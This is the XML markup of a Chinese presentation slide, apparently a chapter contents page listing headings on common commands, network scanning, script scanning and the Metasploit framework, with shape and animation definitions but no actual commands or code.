      <p:bldP spid="6" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="7" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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Text Placeholder 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071996" y="2766621"/>
            <a:ext cx="3008380" cy="662379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="1565050"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="927951"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="982844"/>
              <a:ext cx="1120898" cy="842780"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="927951"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="2471202"/>
            <a:ext cx="1192345" cy="672217"/>
            <a:chOff x="2215144" y="1952311"/>
            <a:chExt cx="1244730" cy="924318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="平行四边形 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="2033848"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="1952311"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="3407000"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="3018134"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="平行四边形 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="3084852"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="文本框 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="3018134"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596626" y="4316986"/>
            <a:ext cx="1192345" cy="677512"/>
            <a:chOff x="2215144" y="4047039"/>
            <a:chExt cx="1244730" cy="931598"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="平行四边形 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="4135856"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="4047039"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="1582798"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="953426"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4615667" y="1005461"/>
              <a:ext cx="3228975" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.1 常用命令</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="953426"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="组合 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="2508336"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="1647579"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644505" y="1715136"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.2 网络扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="平行四边形 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="1647579"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="组合 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="3433872"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="2341731"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644506" y="2450133"/>
              <a:ext cx="2827146" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>.3 脚本扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="平行四边形 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="2341731"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="组合 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5502297" y="4359409"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="3035884"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="矩形 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4623073" y="3097846"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="平行四边形 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="3035884"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
    </p:spTree>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81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>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82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
